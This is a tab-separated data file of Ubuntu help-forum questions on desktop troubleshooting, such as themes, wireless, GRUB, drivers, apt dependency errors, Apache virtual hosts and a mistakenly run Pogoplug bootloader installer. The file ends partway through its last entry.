398010	chrome ui styles are not working under ubuntu ! gtk theme is not working !	chrome version : 31.0.1650.63 ( official build 238485 ) extensions : google docs , lastpass im on a brand new system , just installed ubuntu . when i open chrome , normally the search box , alert windows are styled according to my current system gtk theme . but now they look like classic windows theme ! tried different themes and adjusting the theme under settings > appearance in chrome but still no use . how to fix this ? here 's a screenshot :
398012	no wireless option in network menu in my hp 1000 1416tx	i use ubuntu 12.04 lts in my hp 1000 1416tx . i ca n't find any `` enable wireless network '' , '' creat new wireless network '' , '' connect to hidden wireless network '' , options by clicking the network button on the top right of the screen . how can i enable wi-fi
398014	how to configure/troubleshoot internet broadband connection	i have a broadband connection and when i connect on ubuntu ( 13.10 ) it detects the device , but is unable to connect to the internet . manufacturer : pro link model : p101
398016	how to apply changes when i do n't have the unity plugin enables in ccsm	i installed compizconfig-settings-manager so i can use my pc , but after checkmarking enable unity plugin , i realized there is no way to apply the changes and i am screwed and there is no way to use this pc without terminal . i have a pic , screenshots do n't work without unity plugin so i used my camera please help me out , i ca n't do everything from terminal . thank you so much !
398017	installing zookeeper-server package leads to unmet dependencies	i have a problem in installing zookeeper-server . following is the error message . how to solve this ? sudo apt-get install zookeeper-server reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : zookeeper-server : depends : zookeeper ( = 3.4.5+24-1.cdh4.5.0.p0.23~precise-cdh4.5.0 ) but 3.4.5+dfsg-1 is to be installed e : unable to correct problems , you have held broken packages .
398019	how can i automatically select ubuntu at boot-up ?	i want my computer automatically boot my ubuntu system . but it always starts with this list : linux 3.2.0-57-generic-pae linux 3.2.0-57-generic-pae ( recovery mode ) linux privous memory test ( memtest86+ ) i want my computer to automatically boot into linux 3.2.0-57-generic-pae . this is my /etc/default/grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_savedefault=true grub_default=saved grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=0 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash mem=4g video=lvds-1 : d '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
398022	want to install ubuntu edge on micromax cavas series	i have micromax a117 ( indian mobile ) want to install ubuntu edge on micromax canvas series can you make it avialable for other handsetts slso or publish a document if i can install it on my device my way. ! !
398023	will this wrong command harm my ubuntu os after reboot ?	i 'm trying to install archlinux on a pogoplug ... . but i got an error saying permission was denied because i was not root ... so i know to associate `` sudo '' with root , but i did n't think until afterwards that sudo might only be used as the root command for the ubuntu os ... i checked the directory folder on the ubuntu drive , and sure enough i had written the script to it ... this is the command i entered /tmp $ sudo ./install_uboot_mtd0.sh this is what it spit out ... ... ... . ! ! ! ! ! ! danger danger danger danger danger danger ! ! ! ! ! ! if you lose power to your device while running this script , it could be left in an unusable state . this script will replace the bootloader on /dev/mtd0 . this installer will only work on the following devices : seagate dockstar seagate goflex net seagate goflex home pogoplug v1 pogoplug pink ( v2 ) do not run this installer on any other device . by typing ok , you agree to assume all liabilities and risks associated with running this installer . if you agree , type 'ok ' and press enter to continue : ok # checking for /usr/sbin/nandwrite ... # installing /usr/sbin/nandwrite ... -- 2013-12-30 09:12:24 -- http : /download.doozan.com/uboot/nandwrite.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/nandwrite.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:24 ( 3.18 mb/s ) - `/usr/sbin/nandwrite.md5 ' saved [ 32 ] -- 2013-12-30 09:12:24 -- http : /download.doozan.com/uboot/nandwrite resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 11500 ( 11k ) [ ] saving to : `/usr/sbin/nandwrite' 100 % [ ====================================== > ] 11,500 -- .-k/s in 0.03s 2013-12-30 09:12:25 ( 359 kb/s ) - `/usr/sbin/nandwrite ' saved [ 11500/11500 ] # successfully installed /usr/sbin/nandwrite . # checking for /usr/sbin/nanddump ... # installing /usr/sbin/nanddump ... -- 2013-12-30 09:12:25 -- http : /download.doozan.com/uboot/nanddump.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/nanddump.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:26 ( 2.60 mb/s ) - `/usr/sbin/nanddump.md5 ' saved [ 32 ] -- 2013-12-30 09:12:26 -- http : /download.doozan.com/uboot/nanddump resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 21286 ( 21k ) [ ] saving to : `/usr/sbin/nanddump' 100 % [ ====================================== > ] 21,286 -- .-k/s in 0.07s 2013-12-30 09:12:26 ( 303 kb/s ) - `/usr/sbin/nanddump ' saved [ 21286/21286 ] # successfully installed /usr/sbin/nanddump . # checking for /usr/sbin/flash_erase ... # installing /usr/sbin/flash_erase ... -- 2013-12-30 09:12:26 -- http : /download.doozan.com/uboot/flash_erase.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/flash_erase.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:27 ( 3.33 mb/s ) - `/usr/sbin/flash_erase.md5 ' saved [ 32 ] -- 2013-12-30 09:12:27 -- http : /download.doozan.com/uboot/flash_erase resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 12819 ( 13k ) [ ] saving to : `/usr/sbin/flash_erase' 100 % [ ====================================== > ] 12,819 -- .-k/s in 0.06s 2013-12-30 09:12:27 ( 210 kb/s ) - `/usr/sbin/flash_erase ' saved [ 12819/12819 ] # successfully installed /usr/sbin/flash_erase . # checking for /usr/sbin/fw_printenv ... # installing /usr/sbin/fw_printenv ... -- 2013-12-30 09:12:27 -- http : //download.doozan.com/uboot/fw_printenv.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : unspecified [ text/html ] saving to : `/usr/sbin/fw_printenv.md5' [ < = > ] 32 -- .-k/s in 0s 2013-12-30 09:12:28 ( 3.33 mb/s ) - `/usr/sbin/fw_printenv.md5 ' saved [ 32 ] -- 2013-12-30 09:12:28 -- http : /download.doozan.com/uboot/fw_printenv resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 668497 ( 653k ) [ ] saving to : `/usr/sbin/fw_printenv' 100 % [ ====================================== > ] 668,497 1.46m/s in 0.4s 2013-12-30 09:12:28 ( 1.46 mb/s ) - `/usr/sbin/fw_printenv ' saved [ 668497/668497 ] # successfully installed /usr/sbin/fw_printenv . # checking for /etc/fw_env.config ... # installing /etc/fw_env.config ... -- 2013-12-30 09:12:28 -- http : /download.doozan.com/uboot/fw_env.config.md5 resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 32 [ text/html ] saving to : `/etc/fw_env.config.md5' 100 % [ ====================================== > ] 32 -- .-k/s in 0s 2013-12-30 09:12:29 ( 5.19 mb/s ) - `/etc/fw_env.config.md5 ' saved [ 32/32 ] -- 2013-12-30 09:12:29 -- http : /download.doozan.com/uboot/fw_env.config resolving download.doozan.com ( download.doozan.com ) ... 50.116.34.13 connecting to download.doozan.com ( download.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 329 [ ] saving to : `/etc/fw_env.config' 100 % [ ====================================== > ] 329 -- .-k/s in 0s 2013-12-30 09:12:30 ( 45.2 mb/s ) - `/etc/fw_env.config ' saved [ 329/329 ] # successfully installed /etc/fw_env.config . # validating existing uboot ... /usr/sbin/nanddump : 1 : /usr/sbin/nanddump : syntax error : word unexpected ( expecting `` ) '' ) -- 2013-12-30 09:12:30 -- http : /jeff.doozan.com/uboot/valid-uboot.md5 resolving jeff.doozan.com ( jeff.doozan.com ) ... 50.116.34.13 connecting to jeff.doozan.com ( jeff.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 301 moved permanently location : http : //projects.doozan.com/uboot/valid-uboot.md5 [ following ] -- 2013-12-30 09:12:30 -- http : /projects.doozan.com/uboot/valid-uboot.md5 resolving projects.doozan.com ( projects.doozan.com ) ... 50.116.34.13 connecting to projects.doozan.com ( projects.doozan.com ) |50.116.34.13|:80 ... connected . http request sent , awaiting response ... 200 ok length : 1133 ( 1.1k ) [ text/plain ] saving to : `/tmp/valid-uboot.md5' 100 % [ ====================================== > ] 1,133 -- .-k/s in 0s 2013-12-30 09:12:31 ( 143 mb/s ) - `/tmp/valid-uboot.md5 ' saved [ 1133/1133 ] md5sum : /tmp/uboot-mtd0-dump : no such file or directory did i do irrepairable damage to my os ? it still seems fine for now , but should i fear a reboot ?
398028	how to enable the unity plugin without ccsm	i can only see my desktop pic upon login and that is because unity plugin is n't enabled . i tried ccsm , but there is no way for me to apply changes so the unity plugin remains disabled . i also ca n't close windows because the bar at the top of each window is not there .
398030	change default sound device	after upgrading to ubuntu 13.10 my sound stopped working . i eventually figured out that ubuntu had selected the hdmi sound device instead of my analogue speakers . i switched to the correct device and everything worked fine until i rebooted . i now have to select the correct device every time i boot ubuntu . how do i set my speakers as the default device ? edit : since i upgraded to ubuntu 14.04 ubuntu now selects the onboard sound device by default so i no longer have this problem .
398034	xubuntu 13.10 : how to control what services/daemons are started	the title says it all ... is there a gui to control the services or what daemons are started in what runlevel ? for example , to disable pidgin ( instead of removing it completely ) .
398036	how to share the wireless network through terminal ?	in windows this command netsh wlan start hosted network ssid=username password=password used to work for sharing the wireless lan or say used to work as the connectify-me . so how can i use this facility in linux ?
398039	restoring windows 8 backup while keeping ubuntu 12.04	i have a 32-bit laptop with original pre-installed windows 8 . before last month i have taken a backup with windows os tools and i have then installed ubuntu 12.04 . now i would like to install the backup-ed windows 8 os along the side of ubuntu . i do n't how to do that and i fear losing my data while installing . i also want to know whether we can install windows after ubuntu has been installed .
398041	how to set qalculator as default calculator ?	i am trying to set which calculator will be called when i press the calculator button on the keyboard . my favourite calc app is qalculate . how can i set it be the default one so i can open it via calc button on my keyboard ?
398042	problem in pckage installation from terminal	i 'm trying to install firefox from terminal but everytime i have this error : ehsan @ ehsan-lifebook-ah530 : ~ $ sudo apt-get install firefox e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? what does this mean and how to get around it ?
398048	nintendo 64 , mupen64plus : can not configure controller	i received an nintendo 64 usb controller and tried to use it to play ( this one http : //www.ebay.com/itm/retrolink-classic-nintendo-64-usb-controller-for-pc-and-mac-black-new-/360701283915 ? pt=us_video_game_controllers & hash=item53fb78ce4b ) . so i put it , used this tutorial to install it http : //ubuntuforums.org/showthread.php ? t=338457 and i can see with jstest that it 's working . so i installed mupen64plus and m64py for the gui , so the gui recognize my controller , but i can not use it . i saw on the post how do you configure mupen64plus controls ? that i 'm using the same controller than on the image tbe dragonrise inc one , but every time i change the controls and press enter or click on close it 's just change all the controls by something per default like this : dpad r = `` key ( 100 ) '' dpad l = `` key ( 97 ) '' dpad d = `` key ( 115 ) '' dpad u = `` key ( 119 ) '' start = `` key ( 13 ) '' z trig = `` key ( 122 ) '' b button = `` key ( 306 ) '' a button = `` key ( 304 ) '' c button r = `` key ( 108 ) '' c button l = `` key ( 106 ) '' c button d = `` key ( 107 ) '' c button u = `` key ( 105 ) '' r trig = `` key ( 99 ) '' l trig = `` key ( 120 ) '' mempak switch = `` key ( 44 ) '' rumblepak switch = `` key ( 46 ) '' x axis = `` key ( 276,275 ) '' y axis = `` key ( 273,274 ) '' normally the buttons should be like button 1,2,3 etc i tried with the gui and without the gui but i can not make this controller workinf : / thanks for reading and sorry for my poor english
398052	install teamviewer on ubuntu bootup	i have an ubuntu 12.04 lts clonezilla image in which i have to install teamviewer 9 . my first approach was to install teamviewer on the os and then save a copy of the image . after cloning this image on other machines teamviewer has got duplicated id . this is expected because it is a whole copy of the hard disk . to avoid this duplication of teamviewer id i am trying to install it on first system boot-up . for this i have written a bash script that does the job but i am unable to find a place to put the invocation of this bash script . since my desktop manager is lightdm i tried to place that call in /etc/init/lightdm.conf but then ubuntu never starts x server for some reason . what options below should i use to get this working ? if i 'm to continue with the above approach where should i put my teamviewer installation script ? imo it should be on a upstart script that runs before window manager ( in my case it is openbox ) is this a good approach to install application on ubuntu startup ? if i can remove teamviewer configuration just before creating the image , what specific files should i remove to allow teamviewer to pick up new id . i am very specific to teamviewer 9 ( not 8 or 7 ) ? this can be the easiest way to do this so that i do n't have to run installation script on ubuntu startup level . i have already done this for teamviewer 7 where i delete `` wine '' folder of current user 's home just before cloning . that way when i restore the image on a new machine it picks up a new id . teamviewer 9 may have changed this behaviour and it does not work now .
398055	dell dimension new ram installation problems	i have tried pretty much everything to get this ram ( 2x1gb pc2 5300/5400 ddr2 667mhz ) to work . i am 99.9 percent sure it is compatible with my dell dimension c521 . i know all the slots are working because my old ram ( 2x512mb ddr2 ) works perfectly fine in all the slots ( there are 4 slots ) . when i put in the new ram and start up the computer my screen goes to sleep i hear 1 beep , 3 beeps , another 2 beeps and once again 2 more beeps ( 1-3-2-2 ) . then the fan goes on full blast and there is a green 1 and 3 indicator light that stays on . ( power button lights up green if you were wondering and mother board has the orange light as always ) . either these brand new sticks of ram are shot or i need to update my bios which is almost impossible on ubuntu , i cant figure it out . my current bios version is 1.1.4 but i am able to download version 1.1.11 i do n't have access to a windows disk to run the exe files either . please help ! and thanks in advance .
398056	eclipse ide acting funny	i installed eclipse juno on two different machines ( a ) 32 bit and ( b ) 64 bit . both had openjdk working . in one , the pull down menus of the eclipse ide does not work , and in another , the pull down menus are functioning . incidentally , i had attempted to install kepler on the 64 bit machine , whence the pull down menus were only partially accessible . why is this happening on the machines ?
398058	can i access /sdcard/ in ubuntu touch ?	i 'm able to view ubuntu 's user data from android . is it possible to view my sdcard from ubuntu ? notes : i 'm using the dual boot method explained here
398059	anyway to make hotkey to turn screen off ?	i was just wondering how can one make a script ( or make some changes ) by which i can turn screen off in ubuntu ( 12.04 ) whenever i want , the way screen can be turned off in cellphones . and also i would like to know , if anyhow , one can make a combination of keys ( hotkey thing ) to execute that script ? the only reason i want to know about this is to conserve power ( in laptop : p ) . got this question ( very much the same ) turning monitor off with an icon but there is no hotkey thing . moreover , in the answer , it is said that there are many ways to accomplish this in unixos . i 'd like to know more .
398061	can i run windows based erp with sql server connectivity in ubuntu 12.04 ?	i want to install and run my windows based erp in ubuntu , it is sql based database erp . and i want to login with my active directory credentials . i have windows 2008 r2 server as active directory controller . sql server is 2008 .
398062	amd 7970m catalyst driver not working ( black screen with cursor ) in ubuntu 13.10	so , this is an issue that i have not encountered before . after installing the most recent amd drivers from fglrx through the `` software & updates '' package , the screen goes black and there is only a cursor visible . the same occurs when i restart the computer . this happens regardless of whether i try to install the driver from fglrx-updats or fglrx . i am able to revert to the x.org x server driver by opening a terminal and running `` sudo apt-get remove fglrx* '' . the os seems to revert to the x.org driver automatically after running the command and then restarting the pc . the problem does not persist with the x.org driver , but the games i have run do n't seem utilize the gpu at all . so ... can anybody lend me some help here ? i just started using ubuntu seriously , so i am a bit of a noob . any help would be greatly appreciated . thanks ! system specs : amd 7970m , i7 3610qm , 16gb ddr3 ram , 32gb ssd ( linux ) and 120gb of a 750gb hdd partitioned as storage .
398065	ca n't open file '/var/www/svn/repos/db/txn-current-lock ' : permission denied on rapidsvn	i tried to commit my modified file on svn ( rapidsvn ) . i got the following error : error while performing action : commit failed ( details follow ) : ca n't open file '/var/www/svn/repos/db/txn-current-lock ' : permission denied can anyone help in solving this ? any suggestions are appreciated .
398067	do i need to install drivers for my printer ?	i 've installed ubuntu 12.04 today . how do i print on my iepson fx890 dmp printer ? !
398068	black window at boot ubuntu 13.10 ( installed besides windows 7 ) , amd turion64	not able to boot ubuntu 13.10 ( installed besides windows 7 ) got black window after choosing `` ubuntu '' form drop-down list . there is result of boot-repair : http : //paste.ubuntu.com/6667676/ it did not help . i have amd turion64 . wuld be happy for any hint . thanks
398070	struggling with build commands in geany	i recently installed geany on my ubuntu machine and i 'm looking to compile and run my .java and .class files in specific folders , but i 've hit a brick wall . coming from windows i set the compile build command to javac -d /home/leon/documents/classes `` % f '' and execute to java -cp /home/leon/documents/classes `` % e '' but i get a `` directory not found '' error when i try to build a file even though the directory exists . what am i missing ?
398072	why i installed xubuntu desktop after installing ubuntu 13.10	i needed to solve all these problems : i do n't like the unity interface ubuntu 13.10 has ibus language input method problem eg . chinese if you install xubuntu distro , you have to install many apps eg . libreoffice by yourself to help those gets a blank screen after installing ubuntu ( its due to unsupported video card hardware ) or those who tried to remove unity but got a blank screen after rebooting .
398073	need help installing java jre	i need help installing java not the developer version i can only find about the jdk here . help ? is there easy installers anywhere ?
398082	sync configuration files of lightning	i use the lightening extension of thunderbird . to have my own calendar on different machines , i put the .ics file in my dropbox folder and this works fine . i also would like to share in the same way the configuration files of lightning ( for example to keep the same color events on all the machines , for the kind of events i defined myself ) . i try to share some files of the .thunderbird forlder by chance , but either nothing happens , or thunderbird closes . so which are the good files ? note the following : the way i would like to share subfolders of the .thunderbird one is to put links in this one calling folders in my dropbox i ca n't share all the .thunderbird folder , it is too big i am running ubuntu 12.04 thanks !
398085	how to change a keyboard layout to dvorak that assumes that the keyboard layout is qwerty ?	i use dvorak as my primary keyboard layout . for writing in my native language ( bengali ) , i 'd like to use the probhat layout . but probhat assumes that you are using a qwerty layout . how do i make it understand that i 'm using dvorak so that it matches with the corresponding dvorak keys ? clarification : for example , when i press 'e ' ( 'd ' in qwerty ) , the probhat layout understands it as a 'd ' ( ড ) . i want that it understands it as 'e ' ( ী ) .
398086	ubuntu uses old kernel instead of new one	the command uname -r gives 3.5.0-17-generic , but when i checked in synaptics the kernel 3.5.0-43 is installed , but it seems the system uses the old kernel instead . how can i make it use the new kernel ?
398091	how to configure multiple pcs running lamp , on one 4-port router	i 'm running ubuntu 13.04 64-bit ( ubuntu 12.04.3 lts ) this is fresh install . how do i configure lamp to run apache2 on each pc through a four port router . i want one pc to act as the primary server , with the ability to serve its own web content , while having the other pcs available to receive specific domain requests and server pages . i have the following domain : ⠀showmemn.com i have the following a host : ⠀srv1.showmemn.com ⠀srv2.showmemn.com ⠀srv3.showmemn.com i want each server to respond to calls without a port prefixing the url . i am running through the instructions on virtual hosts from ubuntu documentation apachemysqlphp wiki apache2 has the concept of sites , which are separate configuration files that apache2 will read . these are available in /etc/apache2/sites-available . by default , there is one site available called 000-default . this is what you will see when you browse to http : //localhost or http : //127.0.0.1 . you can have many different site configurations available , and activate only those that you need . as an example , we want the default site to be /home/user/public_html/ . to do this , we must create a new site and then enable it in apache2 . to create a new site : copy the default website as a starting point . sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/mysite.conf edit the new configuration file in a text editor sudo nano on the command line , for example : sudo nano /etc/apache2/sites-available/mysite.conf . the keyboard shortcuts for saving a file in nano and closing nano are always at the bottom of every page in nano . change the documentroot to point to the new location . for example , /home/user/public_html/ change the directory directive , replace `` directory /var/www/ '' by `` directory /home/user/public_html/ '' you can also set separate logs for each site . to do this , change the errorlog and customlog directives . this is optional , but handy if you have many sites save the file now , we must deactivate the old site , and activate our new one . ubuntu provides two small utilities that take care of this : a2ensite ( apache2enable site ) and a2dissite ( apache2disable site ) . sudo a2dissite default & & sudo a2ensite mysite finally , we restart apache2 : sudo /etc/init.d/apache2 restart if you have not created /home/user/public_html/ , you will receive an warning message to test the new site , create a file in /home/user/public_html/ : echo ' < b > hello ! it is working ! < /b > ' > /home/user/public_html/index.html example : srv1.showmemn.com not srv1.showmemn.com:8080 i use godaddy to forward dns requests from the main ip to the router . all internal requests are then referenced via port forwarding : example : ⠀srv1.showmemn.com ( port forwards to 10.0.0.2 ) ⠀srv2.showmemn.com ( port forwards to 10.0.0.5 ) any help would be greatly appreciated . in addition i have not altered /etc/host file , i would like to do this the correct way since all my attempts have failed . in addition , i set up the host file with the following : 127.0.0.1 localhost 127.0.1.1 svr2 10.0.0.2 srv2.showmemn 10.0.0.25 srv1.showmemn.com # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
398094	can we use downloaded android source code at another system	i downloaded the android source code in my laptop , my friend also need that . if i just copy it and give to him , is it work for him ? if yes so how could we do that . we are using different os as i am using ubuntu10.04 & he has 12.04 so is it make any problem . thanks in advance
398096	dropbox is n't started automatically despite the entry on startup applications	i 've added an entry at the startup applications for dropbox to run this command : dropbox start -i . after log on , dropbox is n't started . although , when i run this dropbox start -i from the terminal dropbox starts successfully . is there any log to see why it did n't start ?
398097	neo geo emulator on ubuntu ( 12.04 )	do we have an emulator in ubuntu 12.04 repositories which would allow me to run neo geo ( and capcom ) games ? thanks , ema
398099	what is the difference between 32bit os and 64bit os ?	i want to know what kind of unique features these to have
398103	how do i install ubuntu on to a second hard drive ?	i have 2 hdd in my computer at the moment ... one 2tb hdd that is running windows 8 and one 1tb hdd that i would like to install ubuntu on . i bought the second hdd so that the two do n't have to conflict with each other at all ! how do i install ubuntu onto my second hdd , without affecting my first , and then when i boot up my computer , how can i choose between which os to use ? i have seen it at a friends house : they have a black screen on startup which they can then choose whether they want windows or linux .
398105	usb modem cgu 628 does n't get detected by ubuntu 13.10/13.04	i have a modem usb cmotech cgu 628 ( aka franklin cgu 628a and so on ... ) . the problem is that ubuntu 13.10 ( and 13.04 also ) does n't detect it . i think is a problem with usb-modeswitch . the vendor id is 16d8 but the product id change betweens 6007 , 6006 , f000 and even when it 's f000 it does n't switch to modem automatically . i have always to do it manually by giving : sudo modprobe usbserial vendor=0x16d8 product=0x6006 ( or 6007 , it dependes if i used it before on windows ) i noticed also that the connection speed is lower on ubuntu than on windows ( < 1 mb on ubuntu , ~2mb on windows ) that makes me think that it uses a 2g type connection and not a 3g . is there a way to make it detected automatically and to use the 3g ?
398107	dropbox sync status is not visible in xubuntu . is this normal or only with me ?	as on windows there are no icons showing syncing or the green tick showing sync is complete . all folders and files are just regular folder and files . is this normal with xubuntu ? though when hovering pointer to dropbox icon it tells that syncing is going on or complete but this should also be visible on files .
398111	creating a bootable usb stick using os x without sudo	i 'm using os x mavericks and i have downloaded ubuntu . i wish to use it as a usb stick , but i do not have sudo admin rights . is there any other way to install it ?
398112	java swing text boxes wo n't accept pinyin in ubuntu 13-04	in ubuntu 12.04 and earlier i could use pinyin input into java swing text boxes using ibus . in 13.04 i ca n't choose pinyin input , only english when the swing box has the focus . other apps are okay ( gnome-terminal , firefox , etc ) . anybody know how to fix this ? jan
398113	make touchscreen working with ubuntu 13.10 on dell xps13	i just installed ubuntu 13.10 on my new dell xps 13 laptop but i can not make the touchscreen working . the os sees the synaptics touchscreen : ste @ ste-xps13-9333 : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=9 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ synaptics synaptics large touch screen id=15 [ slave pointer ( 2 ) ] it 's enabled apparently : device 'synaptics synaptics large touch screen ' : device enabled ( 134 ) : 1 coordinate transformation matrix ( 136 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 264 ) : 0 device accel constant deceleration ( 265 ) : 1.000000 device accel adaptive deceleration ( 266 ) : 1.000000 device accel velocity scaling ( 267 ) : 10.000000 device product id ( 253 ) : 1739 , 2808 device node ( 254 ) : `` /dev/input/event14 '' evdev axis inversion ( 268 ) : 0 , 0 evdev axis calibration ( 269 ) : 0 , 2972 , 0 , 1680 evdev axes swap ( 270 ) : 0 axis labels ( 271 ) : `` abs mt position x '' ( 576 ) , `` abs mt position y '' ( 577 ) , `` none '' ( 0 ) , `` none '' ( 0 ) button labels ( 272 ) : `` button unknown '' ( 256 ) , `` button unknown '' ( 256 ) , `` button unknown '' ( 256 ) , `` button wheel up '' ( 140 ) , `` button wheel down '' ( 141 ) evdev middle button emulation ( 273 ) : 0 evdev middle button timeout ( 274 ) : 50 evdev third button emulation ( 275 ) : 0 evdev third button emulation timeout ( 276 ) : 1000 evdev third button emulation button ( 277 ) : 3 evdev third button emulation threshold ( 278 ) : 20 evdev wheel emulation ( 279 ) : 0 evdev wheel emulation axes ( 280 ) : 0 , 0 , 4 , 5 evdev wheel emulation inertia ( 281 ) : 10 evdev wheel emulation timeout ( 282 ) : 200 evdev wheel emulation button ( 283 ) : 4 evdev drag lock buttons ( 284 ) : 0 but when i start the calibration procedure : xinput_calibrator calibrating evdev driver for `` synaptics synaptics large touch screen '' id=15 the touchscreen just does n't work . i checked and the driver is not blacklisted here /etc/modprobe.d/blacklist.conf . i checked also here https : //wiki.ubuntu.com/touchscreen but no help . any idea ? !
398118	thunderbird on dual boot - profile inaccessible	i 'm a first-time ubuntu user - i 've just put 13.10 on my xp system as a dual boot . i used thunderbird portable on the xp machine ( easy to recover every time you need a rebuild ! ) , and i understand that you can use the same profile on ubuntu - sharing the profile location by indicating its location in the profiles.ini file . so i did this using -profilemanager , and it worked nicely . i could access exactly the same data on ubuntu as i could on windows . however , after i turned off and rebooted , i got this message when i started thunderbird : 'thunderbird profile can not be loaded - it may be missing or inaccessible' i looked at the profile.ini file with a text editor - it had n't changed and was still pointing to the right directory . if i deleted it with -profilemanager and re-installed , it worked fine for that session . i could drop thunderbird and start it again - no trouble . but if i re-booted , i lost the profile and had to re-establish it - although the profile.ini file had n't changed . i wonder if this is some kind of privileges issue ? whatever it is , i ca n't think of any more things to try . has someone out there got any ideas ?
398120	fix dependency when apt-get -f install fails	i 'm trying to get cgminer 3.5 on my ubuntu 12.04 to work but it fails because libudev.so.1 is missing . i tried to install libc6 and now i have unmet dependencies . even when i try to run sudo apt-get -f install i get this error : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libc6-dev : depends : libc6 ( = 2.17-0ubuntu5.1 ) but 2.15-0ubuntu10.5 is installed depends : libc-dev-bin ( = 2.17-0ubuntu5.1 ) libudev1 : depends : libc6 ( > = 2.17 ) but 2.15-0ubuntu10.5 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies i already tried to add the raring security repo ( eb http : //security.ubuntu.com/ubuntu raring-security main ) in my sources.list file , run apt-get update etc . but it still want 's to reinstall the 2.15 version which causes errors . \edit : apt-cache policy libc6-dev libc6 libc-dev-bin libudev1 libc6-dev : installed : 2.17-0ubuntu5.1 candidate : 2.17-0ubuntu5.1 version table : *** 2.17-0ubuntu5.1 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages 100 /var/lib/dpkg/status 2.15-0ubuntu10.5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 2.15-0ubuntu10 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libc6 : installed : 2.15-0ubuntu10.5 candidate : 2.17-0ubuntu5.1 version table : 2.17-0ubuntu5.1 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages *** 2.15-0ubuntu10.5 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 2.15-0ubuntu10 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libc-dev-bin : installed : 2.15-0ubuntu10.5 candidate : 2.17-0ubuntu5.1 version table : 2.17-0ubuntu5.1 0 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages *** 